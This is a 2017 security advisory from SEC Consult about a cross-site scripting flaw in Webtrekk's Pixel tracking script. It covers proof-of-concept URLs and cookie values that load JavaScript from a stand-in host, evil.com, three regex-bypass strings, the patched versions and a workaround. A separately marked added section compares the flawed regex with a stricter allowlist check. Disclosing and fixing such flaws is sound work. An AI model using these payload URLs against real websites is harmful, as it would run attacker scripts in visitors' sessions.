Webtrekk Pixel Tracking Cross Site Scripting

Posted Oct 17, 2017
Authored by Malte Batram | Site sec-consult.com

Webtrekk Pixel Track versions 3.24 to 3.40, 4.00 to 4.40, and 5.00 to 5.04 suffer from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | b3b27563cb47af66f17f10561156cccc

SEC Consult Vulnerability Lab Security Advisory < 20171017-0 >
=======================================================================
title: Cross site scripting
product: Webtrekk Pixel tracking
vulnerable version: v3.24 to v3.40, v4.00 to v4.40, v5.00 to v5.04
fixed version: v3.41, v4.41, v5.05
impact: Medium
homepage: https://www.webtrekk.com/
found: 2017-08-29
by: Malte Batram for
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Webtrekk Analytics offers an endless range of filter and analysis functions.
Whatever type of site you operate, our analytics tools give you the raw data
you need to dive into your web and app metrics so you can optimise your
digital marketing campaigns."

Source: https://www.webtrekk.com/en/solutions/analytics/

"At home in Germany, Webtrekk ranks first among professional analytics tools
used by the 1,000 most popular .de domains. All told, Webtrekk has a
22.9 percent market share among providers for the top German domains,
excluding sites that use Google Analytics or have no analytics system."

Source: https://www.webtrekk.com/en/why-webtrekk/market-leader/


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.

SEC Consult recommends performing a thorough security review, conducted by
security professionals, to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1) Cross site scripting vulnerability
The Webtrekk Pixel component, used on many websites to track users, can load
arbitrary external JavaScript via several parameter combinations. The
parameters are parsed from the query string (the "search" part) of the URL.

?wt_overlay=1&wt_reporter=url_for_external_javascript
?wt_heatmap=1&wt_reporter=url_for_external_javascript

The URL specified in the wt_reporter parameter is checked by a regex that can
be bypassed in several ways.


Proof of concept:
-----------------
1) Cross site scripting vulnerability
Example URL:
http://www.example.com/?wt_overlay=1&wt_reporter=report1.webtrekk.com.evil.com/

The example URL leads to the inclusion of the following HTML in the page:
<script language="javascript" type="text/javascript"
src="https://report1.webtrekk.com.evil.com/overlay.pl?
wt_contentId=..."></script>

Regex that checks the URL:
/^(http[s]?:\/\/)?(report\d+|analytics)\.webtrekk\.(com|de).*$/

The .* at the end of the expression allows multiple bypasses:
Subdomain: report1.webtrekk.com.evil.com/
Auth: report1.webtrekk.com@evil.com/
NoSlash: report1.webtrekk.com

The last bypass leads to the inclusion of JavaScript from the domain
overlay.pl, which was open for registration at the time of testing but has
since been registered by Webtrekk for security reasons.

The vulnerability can also be triggered via cookies. This allows an attacker
to execute JavaScript in the victim's session every time the website with the
vulnerable script is visited, after using the URL parameters only once to set
the cookie values.

Cookie values:
wt_overlay=1; wt_overlayFrame=report1.webtrekk.com.evil.com/;
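The following is an added example (not Webtrekk's code, nor the vendor's patch) that puts the regex quoted above next to a stricter validation routine and runs both over the three bypass strings listed in the advisory. The same check applies whether the value arrives in the wt_reporter query parameter or the wt_overlayFrame cookie, since both feed the same string into the script src. The stricter routine (an assumed design) parses the value with the URL parser, requires https, refuses embedded credentials, matches the parsed hostname against an exactly anchored allowlist, and builds the final script URL from the validated origin rather than by concatenating the raw string, so a missing trailing slash can no longer change which host is loaded. The helper names and the "/overlay.pl" path are assumptions for illustration.

```javascript
// Added example, not Webtrekk's code: the advisory's regex beside a stricter
// allowlist check, evaluated over the bypass strings quoted in the advisory.

// Regex quoted in the advisory. The trailing .* means the check constrains
// only a prefix of the string; whatever follows the allowed host label passes.
const WEAK_REPORTER_REGEX = /^(http[s]?:\/\/)?(report\d+|analytics)\.webtrekk\.(com|de).*$/;

function weakCheck(value) {
  return WEAK_REPORTER_REGEX.test(value);
}

// Exact-match allowlist for the parsed hostname: anchored on both ends, no .*
const ALLOWED_HOST = /^(report\d+|analytics)\.webtrekk\.(com|de)$/;

// Stricter validation (assumed design, not the vendor's patch). Returns the
// script URL to load, built from the parsed origin, or null when rejected.
function resolveReporterScript(value) {
  // The original accepts a scheme-less value; normalise to https before parsing.
  const withScheme = /^https?:\/\//i.test(value) ? value : 'https://' + value;
  let url;
  try {
    url = new URL(withScheme);
  } catch (e) {
    return null; // unparsable input is rejected rather than interpolated
  }
  if (url.protocol !== 'https:') return null;                   // no plain http
  if (url.username !== '' || url.password !== '') return null;  // "host@evil.com" form
  if (!ALLOWED_HOST.test(url.hostname)) return null;            // "webtrekk.com.evil.com" form
  // Fixed path appended to the validated origin (assumed path), so a missing
  // trailing slash in the input cannot merge the host with the path.
  return url.origin + '/overlay.pl';
}

// Bypass strings quoted in the advisory, plus one legitimate value (constructed).
const SAMPLES = [
  'report1.webtrekk.com/',            // legitimate
  'report1.webtrekk.com.evil.com/',   // Subdomain bypass
  'report1.webtrekk.com@evil.com/',   // Auth bypass
  'report1.webtrekk.com',             // NoSlash bypass
];

// Side-by-side result for each sample: what the weak regex says, and what the
// stricter routine would actually load.
function compare() {
  return SAMPLES.map((v) => ({
    value: v,
    weakAccepts: weakCheck(v),
    strictLoads: resolveReporterScript(v),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(compare());
}
```

Run with node to see the table: the weak regex accepts all four samples, while the stricter routine rejects the subdomain and credential forms outright and resolves the scheme-less value to the intended Webtrekk host only.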


Vulnerable / tested versions:
-----------------------------
Latest version v4.3.9 tested:
https://support.webtrekk.com/hc/de/article_attachments/115005882469/Webtrekk_EN_Config_Pixel_v4.3.9.zip

Also found to be vulnerable: 3.2.6, 4.0.5, 4.3.5

The setup for version 5 is different, and the static part (tiLoader.min.js)
does not include the vulnerable JavaScript directly. However, code similar to
the overlay functions from versions 3 and 4 appears to be loaded dynamically,
and it includes the same regex check.

According to the vendor, v5 is affected as well.


Vendor contact timeline:
------------------------
2017-08-30: Contacting vendor through ask@webtrekk.com & email under "Contact",
no answer
2017-09-12: Asking for contact again
2017-09-12: Vendor: requests sending the advisory and verifies it internally
2017-09-13: Vendor: optimized validation, fixed in internal version
2017-09-14: Release of patched version and vendor informs their customers
2017-10-17: Coordinated release of security advisory


Solution:
---------
Upgrade to the patched versions from the vendor immediately. The following
versions contain better domain validation and fix the issue according to
the vendor:

v3.41, v4.41, v5.05

According to the vendor, the updated versions are available to all customers
in the support center on the vendor's website, and a message indicating that
a security update is available will be shown.


Workaround:
-----------
Setting "disableOverlayView: true" in the webtrekkConfig prevents the execution
of the vulnerable code.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/about-us/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Batram / @2017
